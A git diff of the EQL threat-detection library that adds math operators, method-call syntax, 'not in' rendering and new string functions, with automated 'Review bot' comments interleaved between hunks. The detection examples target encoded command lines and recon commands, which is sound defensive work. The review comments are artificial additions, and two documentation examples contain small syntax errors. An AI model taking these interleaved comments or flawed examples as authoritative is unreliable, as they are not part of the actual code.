@@ -1442,8 +1417,8 @@ " \n", " \n", " 0\n", - " peace\n", - " [{u'share': u'2', u'surname': u'Dunant', u'id'...\n", + " medicine\n", + " [{'id': '293', 'firstname': 'Emil', 'surname':...\n", " 1901\n", " \n", " \n", @@ -1451,8 +1426,8 @@ "" ], "text/plain": [ - " category laureates year\n", - "0 peace [{u'share': u'2', u'surname': u'Dunant', u'id'... 1901" + " category laureates year\n", + "0 medicine [{'id': '293', 'firstname': 'Emil', 'surname':... 1901" ] }, "execution_count": 13, @@ -1502,38 +1477,38 @@ " \n", " \n", " 0\n", - " physics\n", - " [{u'share': u'2', u'motivation': u'\"for their ...\n", + " chemistry\n", + " [{'id': '261', 'firstname': 'Bruce', 'surname'...\n", " 1984\n", " \n", " \n", " 1\n", - " chemistry\n", - " [{u'share': u'1', u'motivation': u'\"for his de...\n", + " economics\n", + " [{'id': '698', 'firstname': 'Richard', 'surnam...\n", " 1984\n", " \n", " \n", " 2\n", - " medicine\n", - " [{u'share': u'3', u'motivation': u'\"for theori...\n", + " literature\n", + " [{'id': '661', 'firstname': 'Jaroslav', 'surna...\n", " 1984\n", " \n", " \n", " 3\n", - " literature\n", - " [{u'share': u'1', u'motivation': u'\"for his po...\n", + " peace\n", + " [{'id': '546', 'firstname': 'Desmond', 'surnam...\n", " 1984\n", " \n", " \n", " 4\n", - " peace\n", - " [{u'share': u'1', u'surname': u'Tutu', u'id': ...\n", + " physics\n", + " [{'id': '124', 'firstname': 'Carlo', 'surname'...\n", " 1984\n", " \n", " \n", " 5\n", - " economics\n", - " [{u'share': u'1', u'motivation': u'\"for having...\n", + " medicine\n", + " [{'id': '429', 'firstname': 'Niels K.', 'surna...\n", " 1984\n", " \n", " \n", 
@@ -1542,12 +1517,12 @@ ], "text/plain": [ " category laureates year\n", - "0 physics [{u'share': u'2', u'motivation': u'\"for their ... 1984\n", - "1 chemistry [{u'share': u'1', u'motivation': u'\"for his de... 1984\n", - "2 medicine [{u'share': u'3', u'motivation': u'\"for theori... 1984\n", - "3 literature [{u'share': u'1', u'motivation': u'\"for his po... 1984\n", - "4 peace [{u'share': u'1', u'surname': u'Tutu', u'id': ... 1984\n", - "5 economics [{u'share': u'1', u'motivation': u'\"for having... 1984" + "0 chemistry [{'id': '261', 'firstname': 'Bruce', 'surname'... 1984\n", + "1 economics [{'id': '698', 'firstname': 'Richard', 'surnam... 1984\n", + "2 literature [{'id': '661', 'firstname': 'Jaroslav', 'surna... 1984\n", + "3 peace [{'id': '546', 'firstname': 'Desmond', 'surnam... 1984\n", + "4 physics [{'id': '124', 'firstname': 'Carlo', 'surname'... 1984\n", + "5 medicine [{'id': '429', 'firstname': 'Niels K.', 'surna... 1984" ] }, "execution_count": 14, @@ -1597,39 +1572,15 @@ " \n", " \n", " 0\n", - " 1\n", - " 1916\n", - " 0.001695\n", - " \n", - " \n", - " 1\n", - " 2\n", - " 1918\n", - " 0.003390\n", - " \n", - " \n", - " 2\n", - " 3\n", - " 1914\n", - " 0.005085\n", - " \n", - " \n", - " 3\n", - " 4\n", - " 1919\n", - " 0.006780\n", - " \n", - " \n", - " 4\n", " 5\n", " 1901\n", - " 0.008475\n", + " 0.007740\n", " \n", " \n", - " 5\n", + " 1\n", " 6\n", " 1969\n", - " 0.010169\n", + " 0.009288\n", " \n", " \n", "\n", @@ -1637,12 +1588,8 @@ ], "text/plain": [ " count key percent\n", - "0 1 1916 0.001695\n", - "1 2 1918 0.003390\n", - "2 3 1914 0.005085\n", - "3 4 1919 0.006780\n", - "4 5 1901 0.008475\n", - "5 6 1969 0.010169" + "0 5 1901 0.007740\n", + "1 6 1969 0.009288" ] }, "execution_count": 15, @@ -1651,7 +1598,7 @@ } ], "source": [ - "eql_search(\"prize.jsonl\", \"| count year | sort year | unique count\")" + "eql_search(\"prize.jsonl\", \"| count year | sort key | unique count\")" ] }, { 
@@ -2070,21 +2017,21 @@ " \n", " \n", " 0\n", - " 35\n", + " 34\n", " reg.exe\n", - " 0.081776\n", + " 0.079812\n", " \n", " \n", " 1\n", - " 74\n", + " 73\n", " cmd.exe\n", - " 0.172897\n", + " 0.171362\n", " \n", " \n", " 2\n", " 255\n", " PING.EXE\n", - " 0.595794\n", + " 0.598592\n", " \n", " \n", "\n", @@ -2092,9 +2039,9 @@ ], "text/plain": [ " count key percent\n", - "0 35 reg.exe 0.081776\n", - "1 74 cmd.exe 0.172897\n", - "2 255 PING.EXE 0.595794" + "0 34 reg.exe 0.079812\n", + "1 73 cmd.exe 0.171362\n", + "2 255 PING.EXE 0.598592" ] }, "execution_count": 18, @@ -3053,21 +3000,21 @@ "metadata": { "celltoolbar": "Slideshow", "kernelspec": { - "display_name": "Python 2", + "display_name": "Python 3", "language": "python", - "name": "python2" + "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", - "version": 2 + "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", - "pygments_lexer": "ipython2", - "version": "2.7.15" + "pygments_lexer": "ipython3", + "version": "3.7.3" } }, "nbformat": 4, diff --git a/docs/index.rst b/docs/index.rst index 4fed9de..221bb17 100644 --- a/docs/index.rst +++ b/docs/index.rst @@ -30,7 +30,7 @@ If Python is configured and already in the PATH, then ``eql`` will be readily av .. code-block:: console $ eql --version - eql 0.7.0 + eql 0.8 From there, try a :download:`sample json file <_static/example.json>` and test it with EQL. diff --git a/docs/links.rst b/docs/links.rst index 222e0ba..383925f 100644 --- a/docs/links.rst +++ b/docs/links.rst 
@@ -5,4 +5,6 @@ .. _json: https://en.wikipedia.org/wiki/JSON .. _unix head: https://en.wikipedia.org/wiki/Head_(Unix) .. _unix tail: https://en.wikipedia.org/wiki/Tail(Unix) -.. _tatsu: https://tatsu.readthedocs.io \ No newline at end of file +.. _tatsu: https://tatsu.readthedocs.io +.. _lark: https://lark-parser.readthedocs.io +.. _string slicing: https://docs.python.org/3/library/stdtypes.html#common-sequence-operations diff --git a/docs/query-guide/basic-syntax.rst b/docs/query-guide/basic-syntax.rst index 9620ae0..dffa8b6 100644 --- a/docs/query-guide/basic-syntax.rst +++ b/docs/query-guide/basic-syntax.rst @@ -35,6 +35,13 @@ Value comparisons < <= == != >= > +Mathematical operations + .. versionadded:: 0.8 + + .. code-block:: eql + + + - * / % + Wildcard matching .. code-block:: eql @@ -48,11 +55,19 @@ Function calls length(command_line) > 400 add(timestamp, 300) +Method syntax for concise function calls + .. code-block:: eql + + command_line:length() > 400 Lookups against static or dynamic values + .. versionadded:: 0.8 + Support for ``not in`` + .. code-block:: eql user_name in ("Administrator", "SYSTEM", "NETWORK SERVICE") + user_name not in ("Administrator", "SYSTEM", "NETWORK SERVICE") process_name in ("cmd.exe", parent_process_name) Strings @@ -66,7 +81,7 @@ for all characters except the quote character. "hello world" "hello world with 'substring'" - 'example \t of \n escaped \b characters \r etc. \f' + 'example \t of \n escaped \r characters' ?"String with literal 'slash' \ characters included" diff --git a/docs/query-guide/functions.rst b/docs/query-guide/functions.rst index 3903d4c..093a6ee 100644 --- a/docs/query-guide/functions.rst +++ b/docs/query-guide/functions.rst 
@@ -9,52 +9,80 @@ math, string manipulation or more sophisticated expressions to be expressed. .. function:: add(x, y) - Returns ``x + y`` + Returns ``x + y`` -.. function:: arrayContains(some_array, value) + .. versionchanged:: 0.8 + Added ``+`` operator directly. - Check if ``value`` is a member of the array ``some_array``. +.. function:: arrayContains(some_array, value [, ...]) - .. code-block:: eql + Check if ``value`` is a member of the array ``some_array``. - // {my_array: ["value1", "value2", "value3"]} + .. versionchanged:: 0.7 + Support for additional arguments. - arrayContains(my_array, "value2") // returns true - arrayContains(my_array, "value4") // returns false + .. code-block:: eql + + // {my_array: ["value1", "value2", "value3"]} + + arrayContains(my_array, "value2") // returns true + arrayContains(my_array, "value4") // returns false + arrayContains(my_array, "value3", "value4) // returns true + +.. function:: arrayCount(array, variable, expression) + + Count the number of matches in an array to an expression. + .. versionadded:: 0.7 + + .. code-block:: eql + + // {my_array: [{user: "root", props: [{level: 1}, {level: 2}]}, + // {user: "guest", props: [{level: 1}]}] + + arrayCount(my_array, item, item.user == "root") // returns 1 + arrayCount(my_array, item, item.props[0].level == 1) // returns 2 + arrayCount(my_array, item, item.props[1].level == 4) // returns 0 + arrayCount(my_array, item, arrayCount(item.props, p, p.level == 2) == 1) // returns 1 .. function:: arraySearch(array, variable, expression) - Check if any member in the array matches an expression. - Unlike :func:`arrayContains`, this can search over nested structures in arrays, and supports - searching over arrays within arrays. + Check if any member in the array matches an expression. + Unlike :func:`arrayContains`, this can search over nested structures in arrays, and supports + searching over arrays within arrays. - .. code-block:: eql + .. 
code-block:: eql - // {my_array: [{user: "root", props: [{level: 1}, {level: 2}]}, - // {user: "guest", props: [{level: 1}]}] + // {my_array: [{user: "root", props: [{level: 1}, {level: 2}]}, + // {user: "guest", props: [{level: 1}]}] - arraySearch(my_array, item, item.user == "root") // returns true - arraySearch(my_array, item, item.props[0].level == 1) // returns true - arraySearch(my_array, item, item.props[1].level == 4) // returns false - arraySearch(my_array, item, arraySearch(item.props, p, p.level == 2)) // returns true + arraySearch(my_array, item, item.user == "root") // returns true + arraySearch(my_array, item, item.props[0].level == 1) // returns true + arraySearch(my_array, item, item.props[1].level == 4) // returns false + arraySearch(my_array, item, arraySearch(item.props, p, p.level == 2)) // returns true +.. function:: between(source, left, right [, greedy=false, case_sensitive=false]) + Extracts a substring from ``source`` that's also between ``left`` and ``right``. -.. function:: arrayCount(array, variable, expression) + :param greedy: Matches the longest string when set, similar to ``.*`` vs ``.*?``. + :param case_sensitive: Match case when searching for ``left`` and ``right```. - Count the number of matches in an array to an expression. + .. code-block:: eql + + between("welcome to event query language", " ", " ") // returns "to" + between("welcome to event query language", " ", " ", true) // returns "to event query" + +.. function:: cidrMatch(ip_address, cidr_block [, ...]) - .. code-block:: eql + Returns ``true`` if the source address matches any of the provided CIDR blocks. - // {my_array: [{user: "root", props: [{level: 1}, {level: 2}]}, - // {user: "guest", props: [{level: 1}]}] + .. 
versionchanged:: 0.8 - arrayCount(my_array, item, item.user == "root") // returns 1 - arrayCount(my_array, item, item.props[0].level == 1) // returns 2 - arrayCount(my_array, item, item.props[1].level == 4) // returns 0 - arrayCount(my_array, item, arrayCount(item.props, p, p.level == 2) == 1) // returns 1 + .. code-block:: eql + // ip_address = "192.168.152.12" + cidrMatch(ip_address, "10.0.0.0/8", "192.168.0.0/16") // returns true .. function:: concat(...) 
@@ -62,34 +90,69 @@ math, string manipulation or more sophisticated expressions to be expressed. .. code-block:: eql - concat("Process ", process_name, " executed with pid ", pid) + concat("Process ", process_name, " executed with pid ", pid) .. function:: divide(m, n) Return ``m / n`` + .. versionchanged:: 0.8 + Added ``/`` operator directly. + .. function:: endsWith(x, y) Checks if the string ``x`` ends with the substring ``y``. + +.. function:: indexOf(source, substring [, start=0]) + + Find the first position (zero-indexed) of a string where a substring is found. + If ``start`` is provided, then this will find the first occurrence at or after the start position. + + .. code-block:: eql + + indexOf("some-subdomain.another-subdomain.com", ".") // returns 14 + indexOf("some-subdomain.another-subdomain.com", ".", 14) // returns 14 + indexOf("some-subdomain.another-subdomain.com", ".", 15) // returns 32 + + .. function:: length(s) Returns the length of a string. Non-string values return 0. +.. function:: match(source, pattern [, ...]) + + Checks if multiple regular expressions are matched against a source string. + + .. code-block:: eql + + match("event query language", ?"[a-z]+ [a-z]+ [a-z]") // returns true + .. function:: modulo(m, n) Performs the `modulo`_ operator and returns the remainder of ``m / n``. + .. versionchanged:: 0.8 + Added ``%`` operator directly. + .. function:: multiply(x, y) Returns ``x * y`` -.. function:: number(s[, base]) + .. versionchanged:: 0.8 + Added ``*`` operator directly. + +.. function:: number(s [, base=10]) - :param: base: The `base` of a number. Default value is 10 if not provided. + :param number base: The `base`_ of a number. Returns a number constructed from the string ``s``. + .. code-block:: eql + + number("1337") // returns 1337 + number("0xdeadbeef", 16) // 3735928559 + .. function:: startsWith(x, y) Checks if the string ``x`` starts with the string ``y``. 
@@ -102,11 +165,26 @@ math, string manipulation or more sophisticated expressions to be expressed. Returns true if ``b`` is a substring of ``a`` +.. function:: substring(source [, start, end]) + + Extracts a substring between from another string between ``start`` and ``end``. + Like other EQL functions, ``start`` and ``end`` are zero-indexed positions in the string. + Behavior is similar to Python's `string slicing`_ (``source[start:end]``), and negative offsets are supported. + + .. code-block:: eql + + substring("event query language", 0, 5) // returns "event" + substring("event query language", 0, length("event")) // returns "event" + substring("event query language", 6, 11) // returns "query" + substring("event query language", -8) // returns "language" + substring("event query language", -length("language")) // returns "language" + substring("event query language", -5, -1)) // returns "guag" + .. function:: subtract(x, y) Returns ``x - y`` -.. function:: wildcard(value, wildcard, [, ... ]) +.. function:: wildcard(value, wildcard [, ... ]) Compare a value to a list of wildcards. Returns true if any of them match. For example, the following two expressions are equivalent. 
@@ -115,4 +193,22 @@ math, string manipulation or more sophisticated expressions to be expressed. command_line == "* create *" or command_line == "* config *" or command_line == "* start *" - wildcard(command_line, "* create *", "* config *", "* start *") \ No newline at end of file + wildcard(command_line, "* create *", "* config *", "* start *") + +Methods +------- +Calling functions with values returned from other functions can often be difficult to read +for complex expressions. EQL also provides an alternative method syntax that flows more +naturally from left to right. + +For instance, the expression: + +.. code-block:: eql + + length(between(command_line, "-enc ", " ")) > 500 + +is equivalent to the method syntax: + +.. code-block:: eql + + command_line:between(command_line, "-enc ", " "):length() > 500 \ No newline at end of file diff --git a/docs/query-guide/grammar.rst b/docs/query-guide/grammar.rst index 83e96d3..f50de5d 100644 --- a/docs/query-guide/grammar.rst +++ b/docs/query-guide/grammar.rst @@ -5,10 +5,10 @@ Grammar ============= -An external dependency for EQL is the Python library `Tatsu`_. -Tatsu generates a parser generator for the below grammar, which EQL uses to parse queries. +An external dependency for EQL is the Python library `Lark`_. +Lark generates a parser generator for the below grammar, which EQL uses to parse queries. -.. literalinclude:: ../../eql/etc/eql.ebnf +.. literalinclude:: ../../eql/etc/eql.g diff --git a/docs/query-guide/implementation.rst b/docs/query-guide/implementation.rst index 2c59dc5..7e5034c 100644 --- a/docs/query-guide/implementation.rst +++ b/docs/query-guide/implementation.rst @@ -21,7 +21,7 @@ The state changes are described for the per-user ``sequence`` and enumeration e .. code-block:: eql - sequence with by user_name + sequence by user_name [process where process_name == "whoami"] [process where process_name == "hostname"] [process where process_name == "ifconfig"] 
diff --git a/docs/query-guide/pipes.rst b/docs/query-guide/pipes.rst index 42241cb..17fcaff 100644 --- a/docs/query-guide/pipes.rst +++ b/docs/query-guide/pipes.rst @@ -28,8 +28,9 @@ Count the number of times each value occurs process where true | count process_name // results look like - // {"count": 100, "key": "cmd.exe", "percent": .4} - // {"count": 50, "key": "powershell.exe", "percent": .2} + // {"count": 100, "key": "cmd.exe", "percent": 0.5} + // {"count": 50, "key": "powershell.exe", "percent": 0.25} + // {"count": 50, "key": "net.exe", "percent": 0.25} Count the number of times a set of values occur @@ -38,8 +39,9 @@ Count the number of times a set of values occur process where true | count parent_process_name, process_name // results look like - // {"count": 100, "key": ["explorer.exe", "cmd.exe", "percent": .4} - // {"count": 100, "key": ["cmd.exe", "cmd.exe", "percent": .4} + // {"count": 100, "key": ["explorer.exe", "cmd.exe"], "percent": 0.5} + // {"count": 50, "key": ["explorer.exe", "powershell.exe"], "percent": 0.25} + // {"count": 50, "key": ["cmd.exe", "net.exe"], "percent": 0.25} ``unique`` diff --git a/docs/query-guide/sequences.rst b/docs/query-guide/sequences.rst index b985734..339fbf4 100644 --- a/docs/query-guide/sequences.rst +++ b/docs/query-guide/sequences.rst @@ -55,6 +55,7 @@ by moving ``by user_name`` to the top of the query. [ file where file_name == "*.exe"] by file_path [ process where true] by process_path + Managing State -------------- Occasionally, a ``sequence`` needs to carefully manage and expire state. Sequences are valid @@ -69,7 +70,7 @@ For instance, if ``whoami.exe`` executed from a batch file, matching ppid of ``w can only be done while the parent process is alive. As a result, the sequence is valid ``until`` the matching termination event occurs. -.. code-block::eql +.. code-block:: eql sequence [ process where process_name == "cmd.exe" and command_line == "* *.bat*" and event_subtype_full == "creation_event"] by pid 
diff --git a/docs/resources.rst b/docs/resources.rst index 6576204..88432d8 100644 --- a/docs/resources.rst +++ b/docs/resources.rst @@ -5,6 +5,9 @@ Resources Blogs ^^^^^ +* `EQL Threat Hunting `__ +* `Ransomware, interrupted: Sodinokibi and the supply chain `__ +* `Detecting Adversary Tradecraft with Image Load Event Logging and EQL `__ * `EQL's Highway to Shell `__ * `Getting Started with EQL `__ * `EQL For the Masses `__ @@ -13,16 +16,16 @@ Blogs Presentations ^^^^^^^^^^^^^ -* BlackHat 2019: `Fantastic Red-Team Attacks and How to Find Them `__ -* BSIDES SATX 2019: `The Hunter Games: How to Find the Adversary with EQL `__ -* Circle City Con 2019: `The Hunter Games: How to Find the Adversary with EQL `__ +* BSides DFW 2019: ATT&CKing Koadic with EQL (`slides `__) +* BlackHat 2019: `Fantastic Red-Team Attacks and How to Find Them `__ (`slides `__, `blog `__) +* BSides SATX 2019: `The Hunter Games: How to Find the Adversary with EQL `__ (`slides `__) +* Circle City Con 2019: `The Hunter Games: How to Find the Adversary with EQL `__ (`slides `__) * Atomic Friday: `Endgame on EQL `__ (`slides `__, `notebook <_static/eql-crash-course.ipynb>`__) -* MITRE ATT&CK™con: `From Technique to Detection `__ - +* MITRE ATT&CKcon: `From Technique to Detection `__ Additional Resources ^^^^^^^^^^^^^^^^^^^^ -* Event Query Language (`docs `__, `code `__) +* Event Query Language (`docs `__, `code `__, `twitter `__) * EQL Analytics Library (`docs `__, `code `__) diff --git a/eql/__init__.py b/eql/__init__.py index 841e021..4802532 100644 --- a/eql/__init__.py +++ b/eql/__init__.py @@ -42,6 +42,7 @@ parse_literal, parse_query, strict_field_schema, + extract_query_terms, ) from .schema import Schema from .transpilers import ( @@ -52,6 +53,7 @@ ) from .utils import ( ParserConfig, + get_output_types, is_stateful, load_dump, load_extensions, @@ -64,7 +66,7 @@ Walker, ) -__version__ = '0.7.0' +__version__ = '0.8.2' __all__ = ( "__version__", "AnalyticOutput", 
@@ -91,9 +93,11 @@ "allow_enum_fields", "functions", "get_engine", + "get_output_types", "get_post_processor", "get_preprocessor", "get_reducer", + "extract_query_terms", "ignore_missing_fields", "ignore_missing_functions", "is_stateful", diff --git a/eql/ast.py b/eql/ast.py index 5f0a803..9cc103b 100644 --- a/eql/ast.py +++ b/eql/ast.py @@ -4,10 +4,9 @@ import datetime import re from collections import OrderedDict -from operator import lt, le, eq, ne, ge, gt +from operator import lt, le, eq, ne, ge, gt, mul, truediv, mod, add, sub from string import Template -from .functions import get_function from .signatures import SignatureMixin from .types import STRING, BOOLEAN, NUMBER, NULL, PRIMITIVES from .utils import to_unicode, is_string, is_number, ParserConfig @@ -36,6 +35,7 @@ "Or", "Not", "FunctionCall", + "MathOperation", # queries "EventQuery", @@ -89,7 +89,7 @@ def __ne__(self, other): """Check if two ASTs are not equivalent.""" return not self == other - def render(self, precedence=None): + def render(self, precedence=None, **kwargs): """Render the AST in the target language.""" if not self.template: raise NotImplementedError() @@ -98,10 +98,10 @@ def render(self, precedence=None): for name, value in self.iter_slots(): if isinstance(value, (list, tuple)): delim = self.delims[name] - value = [v.render(self.precedence) if isinstance(v, BaseNode) else v for v in value] + value = [v.render(self.precedence, **kwargs) if isinstance(v, BaseNode) else v for v in value] value = delim.join(v for v in value) elif isinstance(value, BaseNode): - value = value.render(self.precedence) + value = value.render(self.precedence, **kwargs) dicted[name] = value return self.template.substitute(dicted) 
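Review bot: `BaseNode.render` now forwards arbitrary `**kwargs` to every child's `render`, and `EqlNode.render` (next hunk) passes them into `self._render(**kwargs)`, but the only consumer added in this diff is `InSet._render(negate=False)`; other `_render` overrides such as `FunctionCall._render(self)` later in this diff take no keyword arguments, so any kwarg that reaches them through the template path raises `TypeError` instead of being ignored. Today this is latent, because `negate=True` is only handed directly to an `InSet` whose `_render` does not propagate it, but the contract should be stated: `"""Render the AST in the target language; extra keyword arguments are forwarded to nested nodes' render()."""`. Either have the base `_render` accept and drop `**kwargs` or document that overrides must accept them. The enclosing `BaseNode` class starts outside this hunk.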
@@ -143,9 +143,9 @@ def _render(self):
 # Render the template if defined
 return super(EqlNode, self).render()
 
- def render(self, precedence=None):
+ def render(self, precedence=None, **kwargs):
 """Render an EQL node and add parentheses to support orders of operation."""
- rendered = self._render()
+ rendered = self._render(**kwargs)
 if precedence is not None and self.precedence is not None and self.precedence > precedence:
 return '({})'.format(rendered)
 return rendered
@@ -391,12 +391,12 @@ def _render(self):
 class FunctionCall(Expression):
 """A call into a user-defined function by name and a list of arguments."""
 
- __slots__ = 'name', 'arguments'
+ __slots__ = 'name', 'arguments', 'as_method'
 precedence = Literal.precedence + 1
 template = Template('$name($arguments)')
 delims = {'arguments': ', '}
 
- def __init__(self, name, arguments):
+ def __init__(self, name, arguments, as_method=False):
 """Call the function by name.
 
 :param str name: The name of the user-defined function
@@ -404,6 +404,7 @@ def __init__(self, name, arguments):
 """
 self.name = name
 self.arguments = arguments or []
+ self.as_method = as_method
 
 @property
 def callback(self):
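Review bot: `as_method` is added to `FunctionCall.__slots__` even though it only affects rendering, so if equality and hashing are derived from the slots (as `BaseNode.render` iterates `iter_slots()` here) then `a:f()` and `f(a)` will compare unequal although they are the same call; either keep it out of the comparison or document that AST equality is syntactic. The visible part of the `__init__` docstring documents `name` but no `:param` line for the new argument is shown; add `:param bool as_method: True when the call was written with method syntax (``arg:name(...)``) and should render that way`. The rest of that docstring lies outside the hunk.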
@@ -427,13 +428,23 @@ def optimize(self):
 except NotImplementedError:
 pass
 
- return FunctionCall(self.name, arguments)
+ return FunctionCall(self.name, arguments, self.as_method)
+
+ def _render(self):
+ """Determine the precedence by checking if it's called as a method."""
+ if self.as_method:
+ return '{base}:{name}({remaining})'.format(
+ base=self.arguments[0].render(self.precedence), name=self.name,
+ remaining=", ".join(arg.render(self.precedence) for arg in self.arguments[1:]))
+
+ return super(FunctionCall, self)._render()
 
 def render(self, precedence=None):
 """Convert wildcards back to the short hand syntax."""
- if self.name == 'wildcard' and len(self.arguments) == 2 and isinstance(self.arguments[1], String):
- lhs, rhs = self.arguments
- return Comparison(lhs, Comparison.EQ, rhs).render(precedence)
+ if self.signature:
+ alternate_render = self.signature.alternate_render(self.arguments, precedence)
+ if alternate_render:
+ return alternate_render
 
 return super(FunctionCall, self).render()
 
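Review bot: The fallback `return super(FunctionCall, self).render()` still drops the `precedence` argument, the same omission this commit fixes in `Not.render` (`super(Not, self).render(precedence)`); change it to `return super(FunctionCall, self).render(precedence)` so parenthesisation is decided against the caller's precedence rather than always `None`. The new `_render` indexes `self.arguments[0]` whenever `as_method` is set, so it relies on the parser never producing a method-style call with zero arguments; that assumption deserves a comment or an explicit guard. Its docstring also says it determines precedence, whereas it renders the `base:name(args)` form; `"""Render the call, using method syntax (``base:name(args)``) when it was written that way."""` would be accurate.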
@@ -467,6 +478,67 @@ def __init__(self, query_type, query): self.query = query +class MathOperation(Expression): + """Mathematical operation between two numeric values.""" + + __slots__ = 'left', 'operator', 'right' + OPERATORS = ('*', '/', '%', '+', '-') + + op_lookup = {'*': mul, '/': truediv, '%': mod, '+': add, '-': sub} + func_lookup = {"*": "multiply", "+": "add", "-": "subtract", "%": "modulo", "/": "divide"} + + min_precedence = NamedSubquery.precedence + 1 + max_precedence = min_precedence + 1 + full_template = Template('$left $operator $right') + negative_template = Template('$operator$right') + + def __init__(self, left, operator, right): # type: (Expression, str, Expression) -> None + """Mathematical operation between two numeric values.""" + self.left = left + self.operator = operator + self.right = right + + def to_function_call(self): + """Convert a math operator to an EQL function call.""" + return FunctionCall(self.func_lookup[self.operator], [self.left, self.right]) + + @property + def precedence(self): + """Get the precedence depending on the operator.""" + if self.operator in "*/%": + return self.min_precedence + else: + return self.max_precedence + + def optimize(self): + """Evaluate literals when possible.""" + left = self.left.optimize() + right = self.right.optimize() + + if isinstance(left, Number) and isinstance(right, Number): + # don't divide by zero when optimizing, leave that to the target implementation + if not (right.value == 0 and self.operator in ("/", "%")): + return Number(self.func(left.value, right.value)) + + if isinstance(right, MathOperation) and right.left == Number(0): + # a +- b parses as a + (0 - b) should become a + -b + if self.operator in ("-", "+") and right.operator in ("-", "+"): + operator = "-" if (self.operator == "-") ^ (right.operator == "-") else "+" + return MathOperation(left, operator, right.right) + + return MathOperation(left, self.operator, right) + + @property + def template(self): + """Make the 
template dynamic.""" + return self.negative_template if self.left == Number(0) else self.full_template + + @property + def func(self): + """Get a callback function for the specific operator.""" + return self.op_lookup[self.operator] + + class Comparison(Expression): """Represents a comparison between two values, as in `` ``. @@ -477,7 +549,7 @@ class Comparison(Expression): LT, LE, EQ, NE, GE, GT = ('<', '<=', '==', '!=', '>=', '>') func_lookup = {LT: lt, LE: le, EQ: eq, NE: ne, GE: ge, GT: gt} - precedence = NamedSubquery.precedence + 1 + precedence = MathOperation.max_precedence + 1 template = Template('$left $comparator $right') def __init__(self, left, comparator, right): @@ -665,16 +737,17 @@ def synonym(self): """Get an equivalent node that does performs multiple comparisons with 'or' and '=='.""" return Or([Comparison(self.expression, Comparison.EQ, v) for v in self.container]) - def _render(self): + def _render(self, negate=False): values = [v.render() for v in self.container] expr = self.expression.render(self.precedence) + operator = 'not in' if negate else 'in' if len(self.container) > 3 and sum(len(v) for v in values) > 40: delim = ',\n' - return '{} in (\n{}\n)'.format(expr, self.indent(delim.join(values))) + return '{lhs} {op} (\n{rhs}\n)'.format(lhs=expr, op=operator, rhs=self.indent(delim.join(values))) else: delim = ', ' - return '{} in ({})'.format(expr, delim.join(values)) + return '{lhs} {op} ({rhs})'.format(lhs=expr, op=operator, rhs=delim.join(values)) class BaseCompound(Expression): 
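Review bot: `MathOperation.optimize` folds literal `/` with `operator.truediv`, so `10 / 2` becomes `Number(5.0)` at optimization time; unless the engine's `divide` function (not visible here) also yields floats for integer operands, the optimized and unoptimized forms of one query produce different values and types, and the rendered query will show `5.0`. Either reuse the runtime callback for constant folding or restrict folding to operators whose result type is unambiguous, and say so above the fold: `# fold literals only where the result matches the engine's runtime semantics (truediv yields float)`. Separately, `self.operator in "*/%"` in `precedence` is a substring test that would also accept `"/%"` or `""`; `self.operator in ("*", "/", "%")` matches the tuple style already used in `optimize`. The class definition spans this hunk and the previous line.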
@@ -740,11 +813,14 @@ def __invert__(self): def render(self, precedence=None): """Convert wildcard functions back to the short hand syntax.""" + if isinstance(self.term, InSet): + return self.term.render(precedence, negate=True) + if isinstance(self.term, FunctionCall) and self.term.name == 'wildcard': if len(self.term.arguments) == 2 and isinstance(self.term.arguments[1], String): lhs, rhs = self.term.arguments return Comparison(lhs, Comparison.NE, rhs).render(precedence) - return super(Not, self).render() + return super(Not, self).render(precedence) class And(BaseCompound): @@ -1198,3 +1274,4 @@ def copy(self): # circular dependency from .walkers import Walker, RecursiveWalker # noqa: E402 +from .functions import get_function # noqa: E402 diff --git a/eql/build.py b/eql/build.py index 20baeb6..67fc5cd 100644 --- a/eql/build.py +++ b/eql/build.py @@ -18,6 +18,7 @@ def render_engine(analytics, engine_type, config=None, analytics_only=False): :return str: Returns the base engine """ load_extensions(force=False) + engine_type = engine_type.lstrip(".") if engine_type not in TextEngine.extensions: raise KeyError("Unable to translate to unknown extension {}.".format(engine_type)) engine_cls = TextEngine.extensions[engine_type] @@ -97,10 +98,13 @@ def get_engine(query, config=None): :param str|dict|EqlAnalytic|PipedQuery query: The query text or parsed query :param dict config: The configuration for PythonEngine """ - if isinstance(query, dict): - query = parse_analytic(query) - elif is_string(query): - query = parse_query(query, implied_base=True, implied_any=True) + engine = PythonEngine(config) + + with engine: + if isinstance(query, dict): + query = parse_analytic(query) + elif is_string(query): + query = parse_query(query, implied_base=True, implied_any=True) def run_engine(inputs): results = [] diff --git a/eql/engine.py b/eql/engine.py index b89ccca..3aff2db 100644 --- a/eql/engine.py +++ b/eql/engine.py 
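Review bot: Parsing in `get_engine` is now wrapped in `with engine:` with no comment saying why, and the reason is not visible in the hunk; presumably the engine context installs its parser configuration (schema, allowed functions) so the query is parsed under the same settings it will be compiled with. A one-line comment would save the next reader a lookup: `# parse inside the engine context so the engine's parser configuration applies to the query`. The remainder of `get_engine`, where `engine` is presumably used, lies outside the hunk.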
@@ -327,7 +327,7 @@ def walk_array(scope): # type: (Scope) -> bool count = count + 1 return count return walk_array - raise TypeError(u"Invalid signature {}".format(node)) + raise EqlCompileError(u"Invalid signature {}".format(node)) def _function_array_search(self, arguments): node = FunctionCall('arraySearch', arguments) @@ -344,7 +344,7 @@ def walk_array(scope): # type: (Scope) -> bool return True return False return walk_array - raise TypeError(u"Invalid signature {}".format(node)) + raise EqlCompileError(u"Invalid signature {}".format(node)) def _convert_function_call(self, node): # type: (FunctionCall) -> callable name = node.name @@ -360,7 +360,7 @@ def _convert_function_call(self, node): # type: (FunctionCall) -> callable func = func.get_callback(*node.arguments) if not callable(func): - raise KeyError("Unknown function {}".format(node.name)) + raise EqlCompileError("Unknown function {}".format(node.name)) get_arguments = self._convert_tuple(node.arguments) @@ -430,7 +430,7 @@ def compare(x, y): def compare(x, y): return types_match(x, y) and x >= y else: - raise NotImplementedError("Unknown comparator {}".format(node.comparator)) + raise EqlCompileError("Unknown comparator {}".format(node.comparator)) def callback(scope): # type: (Scope) -> bool left = get_left(scope) @@ -439,6 +439,9 @@ def callback(scope): # type: (Scope) -> bool return callback + def _convert_math_operation(self, node): # type: (MathOperation) -> callable + return self.convert(node.to_function_call()) + def _convert_and(self, node): # type: (CompoundTerm) -> callable get_terms = [self.convert(term) for term in node.terms] 
